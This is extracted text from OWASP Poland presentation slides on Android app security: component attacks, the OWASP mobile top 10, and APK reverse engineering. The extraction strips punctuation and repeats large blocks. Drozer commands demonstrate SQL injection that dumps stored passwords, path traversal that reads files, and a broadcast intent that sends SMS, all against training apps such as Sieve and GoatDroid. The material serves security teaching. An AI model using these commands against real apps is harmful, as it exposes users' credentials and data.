Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
